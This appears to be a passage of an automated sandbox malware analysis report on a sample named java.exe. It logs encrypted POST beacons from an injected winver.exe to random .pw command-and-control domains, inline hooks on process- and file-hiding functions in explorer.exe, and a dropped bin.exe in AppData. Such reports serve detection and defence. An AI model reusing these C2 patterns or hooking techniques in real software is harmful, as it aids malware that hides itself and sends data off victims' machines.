Dec 22, 2023 21:31:50.629816055 CET | 133 | OUT | Data Raw: 00 80 00 00 00 7c ea f2 16 65 32 ab b0 19 53 d8 85 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c b1 81 92 bb 34 a3 6c 2e 6a e0 79 5e f3 1b 9f a4 f4 fb e5 99 ed dd c0 2b 67 3a 75 69 64 15 b1 97 6e 9c 5d 80 19 92 b5 97 6f e9 78 8e 93
Dec 22, 2023 21:31:50.832914114 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Fri, 22 Dec 2023 20:31:50 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID: 11
Source IP: 192.168.2.4   Source Port: 49746
Destination IP: 216.218.185.162   Destination Port: 80
PID: 7344   Process: C:\Windows\SysWOW64\winver.exe

Timestamp: Dec 22, 2023 21:31:52.053474903 CET   Bytes transferred: 98   Direction: OUT
POST /EiDQjNbWEQ/ HTTP/1.0
Host: vrmtybxxpddg.pw
Content-Length: 157
Data Raw: ea 5f bf 93 aa 57 bf 93 04 0f e1 0b ec 5d be b0 da 6f 8f a3 da 6f 8f a3
Data Ascii: _W]oo

Timestamp: Dec 22, 2023 21:31:52.254502058 CET   Bytes transferred: 133   Direction: OUT
Data Raw: 00 80 00 00 00 72 ec fd 00 6c 21 b5 ba 1a 42 de 96 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c f8 80 90 7d 5f 02 6e ec 89 71 7e 80 10 41 9e 66 1b db e6 5f f9 49 c1 e9 58 a1 7b a7 2d 00 b3 55 4b 8d 5f 46 a1 4b b3 55 54 2d 7e 70 e8
Data Ascii: rl!BYg6u#a}_nq~Af_IX{-UK_FKUT-~ps(I;A~DG +F;UFbB|oXOfAzk4

Timestamp: Dec 22, 2023 21:31:52.456151009 CET   Bytes transferred: 156   Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.21.6
Date: Fri, 22 Dec 2023 20:31:52 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: close


Session ID: 12
Source IP: 192.168.2.4   Source Port: 49748
Destination IP: 216.218.185.162   Destination Port: 80
PID: 7344   Process: C:\Windows\SysWOW64\winver.exe

Timestamp: Dec 22, 2023 21:31:53.740170002 CET   Bytes transferred: 98   Direction: OUT
POST /EiDQjNbWEQ/ HTTP/1.0
Host: fccfxejgtpqb.pw
Content-Length: 157
Data Raw: ad ed 2a 61 ec e5 2a 61 43 bd 74 f9 ab ef 2b 42 9d dd 1a 51 9d dd 1a 51
Data Ascii: *a*aCt+BQQ

Timestamp: Dec 22, 2023 21:31:53.940949917 CET   Bytes transferred: 133   Direction: OUT
Data Raw: 00 80 00 00 00 62 fd f3 12 6d 26 a7 a5 1e 56 cb 93 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 66 9a 7e 2c eb 8f b0 bd 79 6c 2d f1 b6 9e e8 17 f5 b9 50 2f f2 66 13 99 bf b9 a9 d7 9e 9b 1d 25 a4 ad 21 31 5e ff 01 26 54 e7 ac 3f 4e
Data Ascii: bm&VYg6u#af~,yl-P/f%!1^&T?Nl 3BGI(pOn]UZ:oq`Dp4

Timestamp: Dec 22, 2023 21:31:54.143640041 CET   Bytes transferred: 137   Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.21.6
Date: Fri, 22 Dec 2023 20:31:54 GMT
Content-Type: application/octet-stream
Connection: close

The response body then arrives one byte at a time, roughly six seconds apart:

Timestamp: Dec 22, 2023 21:31:54.143652916 CET   Bytes transferred: 1   Direction: IN
Data Raw: 66   Data Ascii: f

Timestamp: Dec 22, 2023 21:32:00.129364014 CET   Bytes transferred: 1   Direction: IN
Data Raw: 63   Data Ascii: c

Timestamp: Dec 22, 2023 21:32:06.119223118 CET   Bytes transferred: 1   Direction: IN
Data Raw: 58   Data Ascii: X

Timestamp: Dec 22, 2023 21:32:12.157475948 CET   Bytes transferred: 1   Direction: IN
Data Raw: 6f   Data Ascii: o

Timestamp: Dec 22, 2023 21:32:18.121309042 CET   Bytes transferred: 1   Direction: IN
Data Raw: 4e   Data Ascii: N

Timestamp: Dec 22, 2023 21:32:24.172709942 CET   Bytes transferred: 1   Direction: IN
Data Raw: 53   Data Ascii: S

Timestamp: Dec 22, 2023 21:32:30.113518953 CET   Bytes transferred: 1   Direction: IN
Data Raw: 6d   Data Ascii: m

Timestamp: Dec 22, 2023 21:32:36.151500940 CET   Bytes transferred: 1   Direction: IN
Data Raw: 6e   Data Ascii: n

Timestamp: Dec 22, 2023 21:32:42.219223022 CET   Bytes transferred: 1   Direction: IN
Data Raw: 43   Data Ascii: C


Session ID: 0
Source IP: 192.168.2.4   Source Port: 49729
Destination IP: 173.222.162.32   Destination Port: 443
PID: 4984   Process: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

Timestamp: 2023-12-22 20:31:12 UTC   Bytes transferred: 2301   Direction: OUT
POST /threshold/xls.aspx HTTP/1.1
Origin: https://www.bing.com
Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
Accept: */*
Accept-Language: en-CH
Content-type: text/xml
X-Agent-DeviceId: 01000A4109000CC6
X-BM-CBT: 1696420817
X-BM-DateFormat: dd/MM/yyyy
X-BM-DeviceDimensions: 784x984
X-BM-DeviceDimensionsLogical: 784x984
X-BM-DeviceScale: 100
X-BM-DTZ: 60
X-BM-Market: CH
X-BM-Theme: 000000;0078d7
X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
X-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1
X-Device-isOptin: false
X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
X-Device-OSSKU: 48
X-Device-Touch: false
X-DeviceID: 01000A4109000CC6
X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-t
X-MSEdge-ExternalExpType: JointCoord
X-PositionerType: Desktop
X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
X-Search-CortanaAvailableCapabilities: None
X-Search-SafeSearch: Moderate
X-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard Time
X-UserAgeClass: Unknown
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: www.bing.com
Content-Length: 2232
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997

Timestamp: 2023-12-22 20:31:12 UTC   Bytes transferred: 2232   Direction: OUT
Data Raw: [hex dump of the request body omitted; the report's printable decoding follows]
Data Ascii: <ClientInstRequest><CID>6666694284484FA1B35CCB433D42E997</CID><Events><E><T>Event.ClientInst</T><IG>892FA07886414BDF8EE1764A59FF39C6</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"C

Timestamp: 2023-12-22 20:31:13 UTC   Bytes transferred: 476   Direction: IN
HTTP/1.1 204 No Content
Access-Control-Allow-Origin: *
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 9D4D8C81492A4AA4A3EC867AC8089804 Ref B: CO1EDGE2420 Ref C: 2023-12-22T20:31:13Z
Date: Fri, 22 Dec 2023 20:31:13 GMT
Connection: close
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.20a6dc17.1703277072.37a1e4e0


Code Manipulations

Function Name           Hook Type   Active in Processes
ZwResumeThread          INLINE      explorer.exe
NtQueryDirectoryFile    INLINE      explorer.exe
ZwEnumerateValueKey     INLINE      explorer.exe
NtResumeThread          INLINE      explorer.exe
ZwCreateUserProcess     INLINE      explorer.exe
NtEnumerateValueKey     INLINE      explorer.exe
NtCreateUserProcess     INLINE      explorer.exe
ZwQueryDirectoryFile    INLINE      explorer.exe

New Data below lists the bytes now found at each hooked function's entry in explorer.exe (0xE9 is the x86 JMP rel32 opcode, i.e. the detour written over the original prolog).

Function Name           Hook Type   New Data
ZwResumeThread          INLINE      0xE9 0x9E 0xE1 0x12 0x25 0x51
NtQueryDirectoryFile    INLINE      0xE9 0x98 0x81 0x12 0x29 0x91
ZwEnumerateValueKey     INLINE      0xE9 0x9C 0xC1 0x12 0x2D 0xD1
NtResumeThread          INLINE      0xE9 0x9E 0xE1 0x12 0x25 0x51
ZwCreateUserProcess     INLINE      0xE9 0x93 0x31 0x11 0x17 0x71
NtEnumerateValueKey     INLINE      0xE9 0x9C 0xC1 0x12 0x2D 0xD1
NtCreateUserProcess     INLINE      0xE9 0x93 0x31 0x11 0x17 0x71
ZwQueryDirectoryFile    INLINE      0xE9 0x98 0x81 0x12 0x29 0x91


Target ID: 0
Start time: 21:30:53
Start date: 22/12/2023
Path: C:\Users\user\Desktop\java.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\java.exe
Imagebase: 0x400000
File size: 116'224 bytes
MD5 hash: 91493A9A9E83A7B48D178AE10F97028D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 21:30:53
Start date: 22/12/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                        Start time:21:30:53
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:winver
                                                                                                                                                                                        Imagebase:0x440000
                                                                                                                                                                                        File size:57'344 bytes
                                                                                                                                                                                        MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                        Start time:21:30:53
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                        Imagebase:0x7ff72b770000
                                                                                                                                                                                        File size:5'141'208 bytes
                                                                                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                        Start time:21:31:01
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\sihost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:sihost.exe
                                                                                                                                                                                        Imagebase:0x7ff796ef0000
                                                                                                                                                                                        File size:111'616 bytes
                                                                                                                                                                                        MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                        Start time:21:31:01
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                        Start time:21:31:01
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:21:31:02
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\ctfmon.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:ctfmon.exe
                                                                                                                                                                                        Imagebase:0x7ff7e3b00000
                                                                                                                                                                                        File size:11'264 bytes
                                                                                                                                                                                        MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                        Start time:21:31:02
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                        Start time:21:31:02
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                        Imagebase:0x7ff7da970000
                                                                                                                                                                                        File size:793'416 bytes
                                                                                                                                                                                        MD5 hash:5CDDF06A40E89358807A2B9506F064D9
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                        Start time:21:31:04
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                        Start time:21:31:04
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Imagebase:0x7ff6fdaa0000
File size:3'671'400 bytes
MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:12
Start time:21:31:09
Start date:22/12/2023
Path:C:\Users\user\AppData\Roaming\F90F00A9\bin.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\F90F00A9\bin.exe"
Imagebase:0x400000
File size:116'224 bytes
MD5 hash:EA8543BCC2E4689874647E2507DA6B29
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Has exited:true

Target ID:13
Start time:21:31:10
Start date:22/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:21:31:17
Start date:22/12/2023
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff71e800000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:16
Start time:21:31:18
Start date:22/12/2023
Path:C:\Windows\System32\smartscreen.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\smartscreen.exe -Embedding
Imagebase:0x7ff7d45b0000
File size:2'378'752 bytes
MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:17
Start time:21:31:18
Start date:22/12/2023
Path:C:\Users\user\AppData\Roaming\F90F00A9\bin.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\F90F00A9\bin.exe"
Imagebase:0x400000
File size:116'224 bytes
MD5 hash:EA8543BCC2E4689874647E2507DA6B29
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:21:31:18
Start date:22/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:21:31:19
Start date:22/12/2023
Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
Imagebase:0x7ff794e20000
File size:19'232 bytes
MD5 hash:F050189D49E17D0D340DE52E9E5B711F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:20
Start time:21:31:20
Start date:22/12/2023
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff71e800000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:23
Start time:21:31:21
Start date:22/12/2023
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff71e800000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:21:31:21
Start date:22/12/2023
Path:C:\Windows\System32\ApplicationFrameHost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
Imagebase:0x7ff7d5d50000
File size:78'456 bytes
MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:25
Start time:21:31:23
Start date:22/12/2023
Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
Imagebase:0x7ff63cc40000
File size:19'456 bytes
MD5 hash:6C44453CD661FC2DB18E4C09C4940399
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:26
Start time:21:31:23
Start date:22/12/2023
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff71e800000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                        Start time:21:31:23
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                                                                                                        Imagebase:0x7ff614e70000
                                                                                                                                                                                        File size:98'104 bytes
                                                                                                                                                                                        MD5 hash:3CD3CD85226FCF576DFE9B70B6DA2630
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                        Start time:21:31:29
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff69a060000
                                                                                                                                                                                        File size:57'856 bytes
                                                                                                                                                                                        MD5 hash:BCE744909EB87F293A85830D02B3D6EB
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                        Start time:21:31:29
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                        Start time:21:31:29
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                        Imagebase:0x7ff70f330000
                                                                                                                                                                                        File size:21'312 bytes
                                                                                                                                                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                        Start time:21:31:30
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0x4
                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                        Start time:21:31:30
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                        Start time:21:31:31
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca
                                                                                                                                                                                        Imagebase:0x7ff6ec4b0000
                                                                                                                                                                                        File size:19'776 bytes
                                                                                                                                                                                        MD5 hash:DA7063B17DBB8BBB3015351016868006
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                        Start time:21:31:32
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
